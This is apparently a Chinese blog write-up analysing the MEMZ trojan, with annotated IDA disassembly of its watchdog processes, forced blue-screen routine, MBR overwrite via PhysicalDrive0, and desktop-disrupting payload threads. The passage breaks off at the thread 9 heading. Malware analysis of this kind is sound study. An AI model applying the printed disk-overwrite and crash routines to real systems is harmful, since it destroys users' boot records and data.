请注意,本文编写于 630 天前,最后修改于 506 天前,其中某些信息可能已经过时。
目录
环境
系统:Windows 7 Service Pack 1
分析工具: IDA x32
一、简要分析
运行病毒样本后会弹出两个警告弹窗,告知用户运行病毒的风险,点击确定后开始运行病毒。
点击完确定后弹出notepad
并且系统开始抽风,打开任务管理器可以看到有6个病毒程序的进程
同时自动弹出浏览器,鼠标晃动,窗口变色及播放各种警告音
如果结束病毒程序进程或者重启,就会触发大量弹窗,并蓝屏,接着再次运行系统就会无限循环播放彩虹猫动画。
以上就是整个病毒运行过程了。
二、详细分析(静态)
第一部分 start
程序会调用GetSystemMetrics函数分别获取屏幕的宽度及高度,还有命令行参数,由于是刚开始运行没有参数,所以会调转到loc_40144F
loc_40144F会有两个弹窗告知用户运行病毒的风险,并判断用户是否点击确定,如果两个弹窗都点了确定,就会调用LocalAlloc从堆中分配指定大小的字节数,接着获取当前进程已加载模块的文件的完整路径,然后循环6次调用ShellExecuteW,其中5次参数为/watchdog, 1次参数为/main的MEMZ进程,所以我们在简要分析任务管理器中看到的6个病毒进程就是这么来的。再接着会调用SetPriorityClass将/main进程优先级调到最高。
asm.text:0040144F loc_40144F: ; CODE XREF: start+37↑j .text:0040144F mov esi, ds:MessageBoxA .text:00401455 mov edi, offset Caption ; "MEMZ" .text:0040145A push 34h ; '4' ; uType .text:0040145C push edi ; lpCaption .text:0040145D push offset Text ; "The software you just executed is consi"... .text:00401462 push ebx ; hWnd .text:00401463 call esi ; MessageBoxA .text:00401465 cmp eax, 6 .text:00401468 jnz loc_4014F6 .text:0040146E push 34h ; '4' ; uType .text:00401470 push edi ; lpCaption .text:00401471 push offset aThisIsTheLastW ; "THIS IS THE LAST WARNING!\r\n\r\nTHE CR"... .text:00401476 push ebx ; hWnd .text:00401477 call esi ; MessageBoxA .text:00401479 cmp eax, 6 .text:0040147C jnz short loc_4014F6 .text:0040147E push 4000h ; uBytes .text:00401483 push 40h ; '@' ; uFlags .text:00401485 call ds:LocalAlloc ; 从堆中分配指定大小的字节数 .text:0040148B push 2000h ; nSize .text:00401490 mov esi, eax .text:00401492 push esi ; lpFilename .text:00401493 push ebx ; hModule .text:00401494 call ds:GetModuleFileNameW ; 获取当前进程已加载模块的文件的完整路径 .text:0040149A push 5 .text:0040149C pop edi .text:0040149D .text:0040149D loc_40149D: ; CODE XREF: start+284↓j .text:0040149D push 0Ah ; nShowCmd .text:0040149F push ebx ; lpDirectory .text:004014A0 push offset String2 ; "/watchdog" .text:004014A5 push esi ; lpFile .text:004014A6 push ebx ; lpOperation .text:004014A7 push ebx ; hwnd .text:004014A8 call ds:ShellExecuteW .text:004014AE sub edi, 1 .text:004014B1 jnz short loc_40149D ; 循环执行5次watchdog .text:004014B3 lea eax, [ebp+pExecInfo] .text:004014B6 mov [ebp+pExecInfo.cbSize], 3Ch ; '<' .text:004014BD push eax ; pExecInfo .text:004014BE mov [ebp+pExecInfo.lpFile], esi .text:004014C1 mov [ebp+pExecInfo.lpParameters], offset aMain ; "/main" .text:004014C8 mov [ebp+pExecInfo.fMask], 40h ; '@' .text:004014CF mov [ebp+pExecInfo.hwnd], ebx .text:004014D2 mov [ebp+pExecInfo.lpVerb], ebx .text:004014D5 mov [ebp+pExecInfo.lpDirectory], ebx .text:004014D8 mov [ebp+pExecInfo.hInstApp], ebx .text:004014DB mov [ebp+pExecInfo.nShow], 0Ah .text:004014E2 call ds:ShellExecuteExW ; 执行1次/main .text:004014E8 push 80h ; '€' ; dwPriorityClass .text:004014ED push [ebp+pExecInfo.hProcess] ; hProcess .text:004014F0 call ds:SetPriorityClass ; 提高/main优先级 .text:004014F6 .text:004014F6 loc_4014F6: ; CODE XREF: start+23B↑j .text:004014F6 ; start+24F↑j .text:004014F6 push ebx .text:004014F7 jmp loc_40132B
最后调用ExitProcess退出进程。
第二部分 /watchdog
经过上面start部分之后,程序首先会判断否为/watchdog为参数的MEMZ进程,如果是就创建线程执行sub_40114A,然后调用RegisterClassEx注册窗口和CreateWindowEx新建窗口并消息循环
asm.text:0040126A push offset String2 ; "/watchdog" .text:0040126F push dword ptr [eax+4] ; lpString1 .text:00401272 call ds:lstrcmpW .text:00401278 test eax, eax .text:0040127A jnz loc_401308 .text:00401280 push ebx ; lpThreadId .text:00401281 push ebx ; dwCreationFlags .text:00401282 push ebx ; lpParameter .text:00401283 push offset sub_40114A ; lpStartAddress .text:00401288 push ebx ; dwStackSize .text:00401289 push ebx ; lpThreadAttributes .text:0040128A call ds:CreateThread ; 创建线程 .text:00401290 lea eax, [ebp+pExecInfo.lpVerb] .text:00401293 mov [ebp+pExecInfo.lpVerb], 30h ; '0' .text:0040129A mov esi, offset ClassName ; "hax" .text:0040129F mov [ebp+pExecInfo.lpParameters], offset sub_401000 ;如果用户尝试重启或关机,会触发 .text:004012A6 push eax ; WNDCLASSEXA * .text:004012A7 mov dword ptr [ebp+pExecInfo.anonymous_0], esi .text:004012AA mov [ebp+pExecInfo.lpFile], ebx .text:004012AD mov [ebp+pExecInfo.lpDirectory], ebx .text:004012B0 mov [ebp+pExecInfo.nShow], ebx .text:004012B3 mov [ebp+pExecInfo.hInstApp], ebx .text:004012B6 mov [ebp+pExecInfo.lpIDList], ebx .text:004012B9 mov [ebp+pExecInfo.lpClass], ebx .text:004012BC mov [ebp+pExecInfo.hkeyClass], ebx .text:004012BF mov [ebp+pExecInfo.dwHotKey], ebx .text:004012C2 mov [ebp+pExecInfo.hProcess], ebx .text:004012C5 call ds:RegisterClassExA ; 注册窗口 .text:004012CB push ebx ; lpParam .text:004012CC push ebx ; hInstance .text:004012CD push ebx ; hMenu .text:004012CE push ebx ; hWndParent .text:004012CF push 64h ; 'd' ; nHeight .text:004012D1 push 64h ; 'd' ; nWidth .text:004012D3 push ebx ; Y .text:004012D4 push ebx ; X .text:004012D5 push ebx ; dwStyle .text:004012D6 push ebx ; lpWindowName .text:004012D7 push esi ; lpClassName .text:004012D8 push ebx ; dwExStyle .text:004012D9 call ds:CreateWindowExA ; 创建窗口 .text:004012DF mov esi, ds:GetMessageW ; 消息循环 .text:004012E5 jmp short loc_4012FB .text:004012E7 ; --------------------------------------------------------------------------- .text:004012E7 .text:004012E7 loc_4012E7: ; CODE XREF: start+D9↓j .text:004012E7 lea eax, [ebp+Msg] .text:004012EA push eax ; lpMsg .text:004012EB call ds:TranslateMessage .text:004012F1 lea eax, [ebp+Msg] .text:004012F4 push eax ; lpMsg .text:004012F5 call ds:DispatchMessageW .text:004012FB .text:004012FB loc_4012FB: ; CODE XREF: start+B8↑j .text:004012FB push ebx ; wMsgFilterMax .text:004012FC push ebx ; wMsgFilterMin .text:004012FD push ebx ; hWnd .text:004012FE lea eax, [ebp+Msg] .text:00401301 push eax ; lpMsg .text:00401302 call esi ; GetMessageW .text:00401304 test eax, eax .text:00401306 jg short loc_4012E7
start时创建了5个/watchdog为参数的MEMZ进程,所以线程也对应了5个
sub_40114A 监测进程及是否主动关机
首先会调用LocalAlloc从堆中分配指定大小的字节数,用于存储路径,然后调用GetCurrentProcess当前进程句柄,再调用GetProcessImageFileNameA获取当前进程路径,
接着一个死循环,CreateToolhelp32Snapshot拍摄进程快照,通过Process32FirstW和Process32NextW遍历进程,再通过一个内循环记录病毒进程数量,esi存放当前遍历到的MEMZ进程数量,var_C存放上一次遍历到的MEMZ的进程的数量,如果esi小于var_C就说明,病毒进程被关闭,调用函数sub_401021,这个函数中会先创建20个线程,弹出大量随机内容随机位置的弹窗后,蓝屏,关机。
asm.text:0040114A sub_40114A proc near ; DATA XREF: start+56↓o .text:0040114A .text:0040114A pe = PROCESSENTRY32W ptr -23Ch .text:0040114A lpString1 = dword ptr -10h .text:0040114A var_C = dword ptr -0Ch .text:0040114A lpString2 = dword ptr -8 .text:0040114A hObject = dword ptr -4 .text:0040114A lpThreadParameter= dword ptr 8 .text:0040114A .text:0040114A push ebp .text:0040114B mov ebp, esp .text:0040114D sub esp, 23Ch .text:00401153 push ebx .text:00401154 push esi .text:00401155 xor ebx, ebx .text:00401157 push edi .text:00401158 mov [ebp+var_C], ebx .text:0040115B mov ebx, 200h .text:00401160 push ebx ; uBytes .text:00401161 push 40h ; '@' ; uFlags .text:00401163 call ds:LocalAlloc ; 从堆中分配指定大小的字节数,用于存储路径 .text:00401169 push ebx .text:0040116A push eax .text:0040116B mov [ebp+lpString1], eax .text:0040116E call ds:GetCurrentProcess ; 获取当前进程句柄 .text:00401174 push eax .text:00401175 call GetProcessImageFileNameA ; 获取进程路径 .text:0040117A push 3E8h ; dwMilliseconds .text:0040117F ;外循环 .text:0040117F while_Begin: ; CODE XREF: sub_40114A+DE↓j .text:0040117F call ds:Sleep ; sleep1秒 .text:00401185 push 0 ; th32ProcessID .text:00401187 push 2 ; dwFlags .text:00401189 call CreateToolhelp32Snapshot .text:0040118E mov edi, eax .text:00401190 mov [ebp+pe.dwSize], 22Ch .text:0040119A lea eax, [ebp+pe] .text:004011A0 push eax ; lppe .text:004011A1 push edi ; hSnapshot .text:004011A2 call Process32FirstW .text:004011A7 mov ebx, [ebp+lpString1] .text:004011AA xor esi, esi .text:004011AC ;内循环,用于统计病毒进程数量 .text:004011AC _dowhile_Begin: ; CODE XREF: sub_40114A+C6↓j .text:004011AC push [ebp+pe.th32ProcessID] ; dwProcessId .text:004011B2 push 0 ; bInheritHandle .text:004011B4 push 400h ; dwDesiredAccess .text:004011B9 call ds:OpenProcess .text:004011BF push 200h ; uBytes .text:004011C4 push 40h ; '@' ; uFlags .text:004011C6 mov [ebp+hObject], eax .text:004011C9 call ds:LocalAlloc .text:004011CF push 200h .text:004011D4 push eax .text:004011D5 push [ebp+hObject] .text:004011D8 mov [ebp+lpString2], eax .text:004011DB call GetProcessImageFileNameA .text:004011E0 push [ebp+lpString2] ; lpString2 .text:004011E3 push ebx ; lpString1 .text:004011E4 call ds:lstrcmpA .text:004011EA test eax, eax .text:004011EC jnz short loc_4011EF .text:004011EE inc esi ;统计进程数量 .text:004011EF .text:004011EF loc_4011EF: ; CODE XREF: sub_40114A+A2↑j .text:004011EF push [ebp+hObject] ; hObject .text:004011F2 call ds:CloseHandle .text:004011F8 push [ebp+lpString2] ; hMem .text:004011FB call ds:LocalFree .text:00401201 lea eax, [ebp+pe] .text:00401207 push eax ; lppe .text:00401208 push edi ; hSnapshot .text:00401209 call Process32NextW .text:0040120E test eax, eax .text:00401210 jnz short _dowhile_Begin .text:00401212 push edi ; hObject .text:00401213 call ds:CloseHandle .text:00401219 cmp esi, [ebp+var_C] ; 比较进程数量 .text:0040121C jge short loc_401223 ; esi < var_C 时运行函数sub_401021 .text:0040121E call sub_401021 .text:00401223 .text:00401223 loc_401223: ; CODE XREF: sub_40114A+D2↑j .text:00401223 mov [ebp+var_C], esi ;保存上一次遍历进程数 .text:00401226 push 0Ah .text:00401228 jmp while_Begin ; sleep1秒 .text:00401228 sub_40114A endp
sub_401021 蓝屏关机
进到函数后,直接创建了20个线程,间隔0.1秒。StartAddress为函数指针
接着RtlAdjustPrivilege提权后NtRaiseHardError制造系统蓝屏
然后通过OpenProcessToken获取进程token,AdjustTokenPrivilege获得访问token的特权后使用ExitWindowsEx注销系统。
StartAddress
首先会下钩子,回调函数为fn,使用sub_401A55获取随机数,并有26条消息保存在lpText所指向的地址中,随机数对0x1A取余,结果存放在edx寄存器,实现在26条消息中随机选取一条MessageBoxA弹出显示。
lpText
sub_401A55
随机数函数
sub_401000 主动关机或重启
回调函数,如果用户主动关机或重启就会调用上面的蓝屏关机函数
如果参数带有/watchdog,创建线程判断是否有当前病毒程序进程是否被结束,如果数量不对,就调用蓝屏关机函数,如果尝试关机或重启,依然会调用蓝屏关机函数。
第三部分 /main
/main 部分刚开始就会调用CreateFileA以读写权限打开\\\\.\\PhysicalDrive0主硬盘,并且覆盖系统原来的MBR,改成自己的恶意代码,也就是我们运行完病毒,重启时会出现的魔性的彩虹猫动画的来源了。
asm.text:00401308 loc_401308: ; CODE XREF: start+4D↑j .text:00401308 push ebx ; hTemplateFile .text:00401309 push ebx ; dwFlagsAndAttributes .text:0040130A push 3 ; dwCreationDisposition .text:0040130C push ebx ; lpSecurityAttributes .text:0040130D push 3 ; dwShareMode .text:0040130F push 0C0000000h ; dwDesiredAccess .text:00401314 push offset FileName ; "\\\\.\\PhysicalDrive0" .text:00401319 call ds:CreateFileA .text:0040131F mov ebx, eax .text:00401321 mov [ebp+hObject], ebx .text:00401324 cmp ebx, 0FFFFFFFFh .text:00401327 jnz short loc_401331 .text:00401329 push 2 ; uExitCode .text:0040132B .text:0040132B loc_40132B: ; CODE XREF: start+170↓j .text:0040132B ; start+1A3↓j ... .text:0040132B call ds:ExitProcess .text:00401331 ; --------------------------------------------------------------------------- .text:00401331 .text:00401331 loc_401331: ; CODE XREF: start+FA↑j .text:00401331 push 10000h ; uBytes .text:00401336 push 40h ; '@' ; uFlags .text:00401338 call ds:LocalAlloc .text:0040133E xor edi, edi .text:00401340 mov esi, eax .text:00401342 cmp ds:dword_4029E8, edi .text:00401348 jbe short loc_401362 .text:0040134A mov edx, offset byte_402118 .text:0040134F mov ecx, esi .text:00401351 sub edx, esi .text:00401353 .text:00401353 loc_401353: ; CODE XREF: start+133↓j .text:00401353 mov al, [edx+ecx] .text:00401356 inc edi .text:00401357 mov [ecx], al .text:00401359 inc ecx .text:0040135A cmp edi, ds:dword_4029E8 .text:00401360 jb short loc_401353 .text:00401362 .text:00401362 loc_401362: ; CODE XREF: start+11B↑j .text:00401362 xor ecx, ecx .text:00401364 cmp ds:dword_4029EC, ecx .text:0040136A jbe short loc_401382 .text:0040136C .text:0040136C loc_40136C: ; CODE XREF: start+153↓j .text:0040136C mov al, ds:byte_402248[ecx] .text:00401372 mov [esi+ecx+1FEh], al .text:00401379 inc ecx .text:0040137A cmp ecx, ds:dword_4029EC .text:00401380 jb short loc_40136C .text:00401382 .text:00401382 loc_401382: ; CODE XREF: start+13D↑j .text:00401382 push 0 ; lpOverlapped .text:00401384 lea eax, [ebp+NumberOfBytesWritten] .text:00401387 push eax ; lpNumberOfBytesWritten .text:00401388 push 10000h ; nNumberOfBytesToWrite .text:0040138D push esi ; lpBuffer .text:0040138E push ebx ; hFile .text:0040138F mov ebx, ds:WriteFile .text:00401395 call ebx ; WriteFile .text:00401397 test eax, eax .text:00401399 jnz short loc_40139F .text:0040139B push 3 .text:0040139D jmp short loc_40132B .text:0040139F ; --------------------------------------------------------------------------- .text:0040139F .text:0040139F loc_40139F: ; CODE XREF: start+16C↑j .text:0040139F push [ebp+hObject] ; hObject .text:004013A2 mov edi, ds:CloseHandle .text:004013A8 call edi ; CloseHandle
覆盖完MBR之后,会创建\\note.txt,并写入文字提示后,用notepad.exe打开note.txt文件。
asm.text:004013AA push 0 ; hTemplateFile .text:004013AC push 80h ; '€' ; dwFlagsAndAttributes .text:004013B1 push 2 ; dwCreationDisposition .text:004013B3 push 0 ; lpSecurityAttributes .text:004013B5 push 3 ; dwShareMode .text:004013B7 push 0C0000000h ; dwDesiredAccess .text:004013BC push offset Parameters ; "\\note.txt" .text:004013C1 call ds:CreateFileA .text:004013C7 mov esi, eax .text:004013C9 cmp esi, 0FFFFFFFFh .text:004013CC jnz short loc_4013D5 .text:004013CE push 4 .text:004013D0 jmp loc_40132B .text:004013D5 ; --------------------------------------------------------------------------- .text:004013D5 .text:004013D5 loc_4013D5: ; CODE XREF: start+19F↑j .text:004013D5 push 0 ; lpOverlapped .text:004013D7 lea eax, [ebp+NumberOfBytesWritten] .text:004013DA push eax ; lpNumberOfBytesWritten .text:004013DB push ds:nNumberOfBytesToWrite ; nNumberOfBytesToWrite .text:004013E1 push offset aYourComputerHa ; "YOUR COMPUTER HAS BEEN FUCKED BY THE ME"... .text:004013E6 push esi ; hFile .text:004013E7 call ebx ; WriteFile .text:004013E9 test eax, eax .text:004013EB jnz short loc_4013F4 .text:004013ED push 5 .text:004013EF jmp loc_40132B .text:004013F4 ; --------------------------------------------------------------------------- .text:004013F4 .text:004013F4 loc_4013F4: ; CODE XREF: start+1BE↑j .text:004013F4 push esi ; hObject .text:004013F5 call edi ; CloseHandle .text:004013F7 push 0Ah ; nShowCmd .text:004013F9 xor ebx, ebx .text:004013FB push ebx ; lpDirectory .text:004013FC push offset Parameters ; "\\note.txt" .text:00401401 push offset File ; "notepad" .text:00401406 push ebx ; lpOperation .text:00401407 push ebx ; hwnd .text:00401408 call ds:ShellExecuteA
接着调用CreateThread创建线程,创建10个线程,从off_405130,依次调用10个函数。
线程1:
随机运行 浏览器,计算器,记事本,cmd,任务管理器,注册表管理器等等。
asm.data:00405000 ; DATA XREF: sub_4014FC+18↑r .data:00405000 ; "http://google.co.ck/search?q=best+way+t"... .data:00405004 dd offset aHttpGoogleCoCk_0 ; "http://google.co.ck/search?q=how+2+remo"... .data:00405008 dd offset aHttpGoogleCoCk_1 ; "http://google.co.ck/search?q=mcafee+vs+"... .data:0040500C dd offset aHttpGoogleCoCk_2 ; "http://google.co.ck/search?q=how+to+sen"... .data:00405010 dd offset aHttpGoogleCoCk_3 ; "http://google.co.ck/search?q=minecraft+"... .data:00405014 dd offset aHttpGoogleCoCk_4 ; "http://google.co.ck/search?q=how+to+get"... .data:00405018 dd offset aHttpGoogleCoCk_5 ; "http://google.co.ck/search?q=bonzi+budd"... .data:0040501C dd offset aHttpGoogleCoCk_6 ; "http://google.co.ck/search?q=how+2+buy+"... .data:00405020 dd offset aHttpGoogleCoCk_7 ; "http://google.co.ck/search?q=how+to+cod"... .data:00405024 dd offset aHttpGoogleCoCk_8 ; "http://google.co.ck/search?q=what+happe"... .data:00405028 dd offset aHttpGoogleCoCk_9 ; "http://google.co.ck/search?q=g3t+r3kt" .data:0040502C dd offset aHttpGoogleCoCk_10 ; "http://google.co.ck/search?q=batch+viru"... .data:00405030 dd offset aHttpGoogleCoCk_11 ; "http://google.co.ck/search?q=virus.exe" .data:00405034 dd offset aHttpGoogleCoCk_12 ; "http://google.co.ck/search?q=internet+e"... .data:00405038 dd offset aHttpGoogleCoCk_13 ; "http://google.co.ck/search?q=facebook+h"... .data:0040503C dd offset aHttpGoogleCoCk_14 ; "http://google.co.ck/search?q=virus+buil"... .data:00405040 dd offset aHttpGoogleCoCk_15 ; "http://google.co.ck/search?q=how+to+cre"... .data:00405044 dd offset aHttpGoogleCoCk_16 ; "http://google.co.ck/search?q=how+to+rem"... .data:00405048 dd offset aHttpGoogleCoCk_17 ; "http://google.co.ck/search?q=my+compute"... .data:0040504C dd offset aHttpGoogleCoCk_18 ; "http://google.co.ck/search?q=dank+memz" .data:00405050 dd offset aHttpGoogleCoCk_19 ; "http://google.co.ck/search?q=how+to+dow"... .data:00405054 dd offset aHttpGoogleCoCk_20 ; "http://google.co.ck/search?q=half+life+"... .data:00405058 dd offset aHttpGoogleCoCk_21 ; "http://google.co.ck/search?q=is+illumin"... .data:0040505C dd offset aHttpGoogleCoCk_22 ; "http://google.co.ck/search?q=montage+pa"... .data:00405060 dd offset aHttpGoogleCoCk_23 ; "http://google.co.ck/search?q=the+memz+a"... .data:00405064 dd offset aHttpGoogleCoCk_24 ; "http://google.co.ck/search?q=stanky+dan"... .data:00405068 dd offset aHttpGoogleCoCk_25 ; "http://google.co.ck/search?q=john+cena+"... .data:0040506C dd offset aHttpGoogleCoCk_26 ; "http://google.co.ck/search?q=vinesauce+"... .data:00405070 dd offset aHttpGoogleCoCk_27 ; "http://google.co.ck/search?q=skrillex+s"... .data:00405074 dd offset aHttpAnswersMic ; "http://answers.microsoft.com/en-us/prot"... .data:00405078 dd offset aHttpMotherboar ; "http://motherboard.vice.com/read/watch-"... .data:0040507C dd offset aHttpPlayClubpe ; "http://play.clubpenguin.com" .data:00405080 dd offset aHttpPcoptimize ; "http://pcoptimizerpro.com" .data:00405084 dd offset aHttpSoftonicCo ; "http://softonic.com" .data:00405088 dd offset aCalc ; "calc" .data:0040508C dd offset File ; "notepad" .data:00405090 dd offset aCmd ; "cmd" .data:00405094 dd offset aWrite ; "write" .data:00405098 dd offset aRegedit ; "regedit" .data:0040509C dd offset aExplorer ; "explorer" .data:004050A0 dd offset aTaskmgr ; "taskmgr" .data:004050A4 dd offset aMsconfig ; "msconfig" .data:004050A8 dd offset aMspaint ; "mspaint" .data:004050AC dd offset aDevmgmtMsc ; "devmgmt.msc" .data:004050B0 dd offset aControl ; "control" .data:004050B4 dd offset aMmc ; "mmc"
线程2:
线程2,随机设置鼠标位置
asm.text:0040156D push ebp .text:0040156E mov ebp, esp .text:00401570 push ecx .text:00401571 push ecx .text:00401572 push ebx .text:00401573 push esi .text:00401574 push edi .text:00401575 lea eax, [ebp+Point] .text:00401578 push eax ; lpPoint .text:00401579 call ds:GetCursorPos .text:0040157F mov eax, [ebp+arg_4] .text:00401582 mov ecx, 898h .text:00401587 cdq .text:00401588 idiv ecx .text:0040158A lea esi, [eax+2] .text:0040158D call sub_401A55 .text:00401592 cdq .text:00401593 idiv esi .text:00401595 mov edi, edx .text:00401597 call sub_401A55 .text:0040159C cdq .text:0040159D idiv esi .text:0040159F mov esi, edx .text:004015A1 call sub_401A55 .text:004015A6 push 3 .text:004015A8 cdq .text:004015A9 pop ebx .text:004015AA idiv ebx .text:004015AC dec edx .text:004015AD imul edx, edi .text:004015B0 add edx, [ebp+Point.y] .text:004015B3 push edx ; Y .text:004015B4 call sub_401A55 .text:004015B9 cdq .text:004015BA idiv ebx .text:004015BC dec edx .text:004015BD imul edx, esi .text:004015C0 add edx, [ebp+Point.x] .text:004015C3 push edx ; X .text:004015C4 call ds:SetCursorPos .text:004015CA push 2 .text:004015CC pop eax .text:004015CD pop edi .text:004015CE pop esi .text:004015CF pop ebx .text:004015D0 mov esp, ebp .text:004015D2 pop ebp .text:004015D3 retn .text:004015D3 sub_40156D endp
线程3:
控制键盘,模拟键盘事件
asm.text:004017A5 pInputs = tagINPUT ptr -1Ch .text:004017A5 .text:004017A5 push ebp .text:004017A6 mov ebp, esp .text:004017A8 sub esp, 1Ch .text:004017AB mov [ebp+pInputs.type], 1 .text:004017B2 call sub_401A55 .text:004017B7 push 2Ah ; '*' .text:004017B9 pop ecx .text:004017BA cdq .text:004017BB idiv ecx .text:004017BD push 1Ch ; cbSize .text:004017BF lea eax, [ebp+pInputs] .text:004017C2 add edx, 30h ; '0' .text:004017C5 push eax ; pInputs .text:004017C6 push 1 ; cInputs .text:004017C8 mov word ptr [ebp+pInputs.anonymous_0], dx .text:004017CC call ds:SendInput .text:004017D2 call sub_401A55 .text:004017D7 cdq .text:004017D8 mov ecx, 190h .text:004017DD idiv ecx .text:004017DF lea eax, [edx+12Ch] .text:004017E5 mov esp, ebp .text:004017E7 pop ebp .text:004017E8 retn .text:004017E8 sub_4017A5 endp
线程4:
播放声音
asm.text:004016A0 sub_4016A0 proc near ; DATA XREF: .data:00405148↓o .text:004016A0 push 1 ; fdwSound .text:004016A2 push 0 ; hmod .text:004016A4 call sub_401A55 .text:004016A9 xor edx, edx .text:004016AB div ds:dword_402114 .text:004016B1 push pszSound[edx*4] ; pszSound .text:004016B8 call ds:PlaySoundA .text:004016BE call sub_401A55 .text:004016C3 push 14h .text:004016C5 cdq .text:004016C6 pop ecx .text:004016C7 idiv ecx .text:004016C9 lea eax, [ecx+edx] .text:004016CC retn .text:004016CC sub_4016A0 endp
线程5:
获取窗口相关信息,不知道干什么
asm.text:004015D4 push ebp .text:004015D5 mov ebp, esp .text:004015D7 sub esp, 10h .text:004015DA push esi .text:004015DB push edi .text:004015DC call ds:GetDesktopWindow .text:004015E2 mov edi, eax .text:004015E4 push edi ; hWnd .text:004015E5 call ds:GetWindowDC .text:004015EB mov esi, eax .text:004015ED lea eax, [ebp+Rect] .text:004015F0 push eax ; lpRect .text:004015F1 push edi ; hWnd .text:004015F2 call ds:GetWindowRect .text:004015F8 mov eax, [ebp+Rect.bottom] .text:004015FB xor ecx, ecx .text:004015FD sub eax, [ebp+Rect.top] .text:00401600 push 330008h ; rop .text:00401605 push ecx ; y1 .text:00401606 push ecx ; x1 .text:00401607 push esi ; hdcSrc .text:00401608 push eax ; cy .text:00401609 mov eax, [ebp+Rect.right] .text:0040160C sub eax, [ebp+Rect.left] .text:0040160F push eax ; cx .text:00401610 push ecx ; y .text:00401611 push ecx ; x .text:00401612 push esi ; hdc .text:00401613 call ds:BitBlt .text:00401619 push esi ; hDC .text:0040161A push edi ; hWnd .text:0040161B call ds:ReleaseDC .text:00401621 push 64h ; 'd' .text:00401623 pop eax .text:00401624 pop edi .text:00401625 pop esi .text:00401626 mov esp, ebp .text:00401628 pop ebp .text:00401629 retn .text:00401629 sub_4015D4 endp .text:00401629
线程6:
创建线程,弹MessageBox
asm.text:0040162A .text:0040162A push ebp .text:0040162B mov ebp, esp .text:0040162D push ecx .text:0040162E push ecx .text:0040162F xor eax, eax .text:00401631 push eax ; lpThreadId .text:00401632 push eax ; dwCreationFlags .text:00401633 push eax ; lpParameter .text:00401634 push offset sub_401994 ; lpStartAddress .text:00401639 push 1000h ; dwStackSize .text:0040163E push eax ; lpThreadAttributes .text:0040163F call ds:CreateThread .text:00401645 call sub_401A55 .text:0040164A push 1Eh .text:0040164C cdq .text:0040164D pop ecx .text:0040164E idiv ecx .text:00401650 mov [ebp+var_4], edx .text:00401653 fild [ebp+var_4] .text:00401656 fstp qword ptr [ebp-8] .text:00401659 fld qword ptr [ebp-8] .text:0040165C fild [ebp+arg_0] .text:0040165F fstp qword ptr [ebp-8] .text:00401662 fld qword ptr [ebp-8] .text:00401665 fmul ds:dbl_403A28 .text:0040166B fadd ds:dbl_403A30 .text:00401671 fdivr ds:dbl_403A88 .text:00401677 fadd ds:dbl_403A60 .text:0040167D faddp st(1), st .text:0040167F call sub_401B09 .text:00401684 mov esp, ebp .text:00401686 pop ebp .text:00401687 retn .text:00401687 sub_40162A endp
asm.text:00401994 push esi .text:00401995 call ds:GetCurrentThreadId .text:0040199B push eax ; dwThreadId .text:0040199C push 0 ; hmod .text:0040199E push offset fn ; lpfn .text:004019A3 push 5 ; idHook .text:004019A5 call ds:SetWindowsHookExW .text:004019AB push 1030h ; uType .text:004019B0 push offset aLol ; "lol" .text:004019B5 push offset aStillUsingThis ; "Still using this computer?" .text:004019BA push 0 ; hWnd .text:004019BC mov esi, eax .text:004019BE call ds:MessageBoxW .text:004019C4 push esi ; hhk .text:004019C5 call ds:UnhookWindowsHookEx .text:004019CB xor eax, eax .text:004019CD pop esi .text:004019CE retn 4 .text:004019CE sub_401994 endp
线程7:
跟着鼠标移动,绘制各种各样的图标
asm.text:00401866 push ebp .text:00401867 mov ebp, esp .text:00401869 sub esp, 14h .text:0040186C push ebx .text:0040186D push esi .text:0040186E mov esi, ds:GetSystemMetrics .text:00401874 push edi .text:00401875 push 0Bh ; nIndex .text:00401877 call esi ; GetSystemMetrics .text:00401879 cdq .text:0040187A sub eax, edx .text:0040187C mov edi, eax .text:0040187E push 0Ch ; nIndex .text:00401880 sar edi, 1 .text:00401882 call esi ; GetSystemMetrics .text:00401884 cdq .text:00401885 sub eax, edx .text:00401887 mov esi, eax .text:00401889 sar esi, 1 .text:0040188B call ds:GetDesktopWindow .text:00401891 push eax ; hWnd .text:00401892 mov [ebp+hWnd], eax .text:00401895 call ds:GetWindowDC .text:0040189B mov ebx, eax .text:0040189D lea eax, [ebp+Point] .text:004018A0 push eax ; lpPoint .text:004018A1 call ds:GetCursorPos .text:004018A7 push 7F01h ; lpIconName .text:004018AC push 0 ; hInstance .text:004018AE call ds:LoadIconW .text:004018B4 push eax ; hIcon .text:004018B5 mov eax, [ebp+Point.y] .text:004018B8 sub eax, esi .text:004018BA push eax ; Y .text:004018BB mov eax, [ebp+Point.x] .text:004018BE sub eax, edi .text:004018C0 mov edi, ds:DrawIcon .text:004018C6 push eax ; X .text:004018C7 push ebx ; hDC .text:004018C8 call edi ; DrawIcon .text:004018CA call sub_401A55 .text:004018CF fild [ebp+arg_0] .text:004018D2 mov esi, eax .text:004018D4 fstp [ebp+var_14] .text:004018D7 fld [ebp+var_14] .text:004018DA fdiv ds:dbl_403A78 .text:004018E0 fld1 .text:004018E2 fadd st(1), st .text:004018E4 fld ds:dbl_403A50 .text:004018EA fdivrp st(2), st .text:004018EC faddp st(1), st .text:004018EE call sub_401B09 .text:004018F3 mov ecx, eax .text:004018F5 mov eax, esi .text:004018F7 cdq .text:004018F8 idiv ecx .text:004018FA test edx, edx .text:004018FC jnz short loc_401928 .text:004018FE push 7F03h ; lpIconName .text:00401903 push edx ; hInstance .text:00401904 call ds:LoadIconW .text:0040190A push eax ; hIcon .text:0040190B call sub_401A55 .text:00401910 cdq .text:00401911 idiv dword_405188 .text:00401917 push edx ; Y .text:00401918 call sub_401A55 .text:0040191D cdq .text:0040191E idiv dword_405184 .text:00401924 push edx ; X .text:00401925 push ebx ; hDC .text:00401926 call edi ; DrawIcon .text:00401928 .text:00401928 loc_401928: ; CODE XREF: sub_401866+96↑j .text:00401928 push ebx ; hDC .text:00401929 push [ebp+hWnd] ; hWnd .text:0040192C call ds:ReleaseDC .text:00401932 push 2 .text:00401934 pop eax .text:00401935 pop edi .text:00401936 pop esi .text:00401937 pop ebx .text:00401938 mov esp, ebp .text:0040193A pop ebp .text:0040193B retn .text:0040193B sub_401866 endp
线程8:
枚举子窗口
asm.text:00401688 sub_401688 proc near ; DATA XREF: .data:00405168↓o .text:00401688 push 0 ; lParam .text:0040168A push offset EnumFunc ; lpEnumFunc .text:0040168F call ds:GetDesktopWindow .text:00401695 push eax ; hWndParent .text:00401696 call ds:EnumChildWindows .text:0040169C push 32h ; '2' .text:0040169E pop eax .text:0040169F retn .text:0040169F sub_401688 endp
线程9:
拉伸或压缩窗口
